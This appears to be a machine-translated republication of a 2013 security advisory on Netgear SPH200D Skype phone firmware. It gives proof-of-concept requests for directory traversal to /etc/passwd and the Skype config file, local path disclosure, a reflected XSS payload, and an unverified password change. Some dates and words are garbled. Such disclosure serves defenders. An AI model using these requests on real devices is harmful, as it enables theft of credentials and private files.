Multiple Netgear SPH200D Security Vulnerabilities

Release date:
Updated on: 2013-02-02

Affected Systems:
Netgear SPH200D
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57660
 
Netgear SPH200D is a wireless Skype Network phone.
 
Netgear SPH200D Firmware 1.0.4.80 and other versions have the directory traversal vulnerability, cross-site scripting vulnerability, and Security Bypass Vulnerability, attackers can exploit these vulnerabilities to steal cookie authentication information, execute arbitrary scripts in the context of a browser, bypass security restrictions, perform unauthorized operations, and access local files and sensitive information.
 
<* Source: m-1-k-3
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Device Name: SPH200D
Vendor: Netgear

============= Vulnerable Firmware Releases: ==================

Firmware Version: 1.0.4.80
Kernel Version: 4.1-18
Web Server Version 1.5

============= Device Description: ====================

Http://support.netgear.com/product/SPH200D

============== Shodan Torks ====================

Shodan Search: SPH200D
=> Results 337 devices

=========== Vulnerability Overview: ======================

* Directory traversal:

Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.

Request:
Http: // 192.168.178.103/.../../etc/passwd

Response:
HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980.7: 00: 00.GMT
Pragma: no-cache
Server: simple httpd 1.0

Root: x: 0: 0: root:/bin/bash
Demo: x: 5000: 100: Demo User:/home/demo:/bin/bash
Nobody: x: 65534: 65534: Nobody:/htdocs:/bin/bash

 

If you request a directory you will get a very nice directory listing for browsing through the filesystem:
/../Var/

HTTP/1.0 200 OK
Content-type: text/html
Expires: Sat, 24 May 1980.7: 00: 00.GMT
Pragma: no-cache
Server: simple httpd 1.0

<H1> Index of.../../var/</H1>

<P> <a href = "/.../var/.">. </a> </p>
<P> <a href = "/.../var/...">... </a> </p>
<P> <a href = "/.../var/. Skype">. Skype </a> </p>
<P> <a href = "/.../var/jffs2"> jffs2 </a> </p>
<P> <a href = "/.../var/htdocs"> htdocs </a> </p>
<P> <a href = "/.../var/cnxt"> cnxt </a> </p>
<P> <a href = "/.../var/ppp"> ppp </a> </p>
<P> <a href = "/.../var/conf"> conf </a> </p>
<P> <a href = "/.../var/bin"> bin </a> </p>
<P> <a href = "/.../var/usr"> usr </a> </p>
<P> <a href = "/.../var/tmp"> tmp </a> </p>

So with this information you are able to access the skype configuration with the following request:
/../Var/. Skype/<user>/config. xml

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/LFI-01.preview.png

* For changing the current password there is no request to the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

* Local path disclosure:

Request:
Http: // 192.168.178.103/% 3C/

Response:
The requested URL '/var/htdocs/% 3C/' was not found on this server.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/local-path-disclosure.png

* Reflected Cross Site Scripting

Appending scripts to the URL reveals that this is not properly validated for malicious input.
Http: // 192.168.178.102/network-dhcp.html4f951 <script> alert (1) </script> e51c012502f

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/XSSed-IE6.png

=============== Solution ==================

No known solution available.

============= Credits =================

The vulnerability was discovered by Michael Messner
Mail: devnull # at # s3cur1ty # dot # de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-002
Twitter: @ s3cur1ty_de

============= Time Line: ======================

August 2012-discovered vulnerability
07.08.2012-reported vulnerability to Netgear
08.08.2012-case closed by Netgear
292.161.2013-public release

================================= Advisory end ======================== ====

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Netgear
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://support.netgear.com/product/SPH200D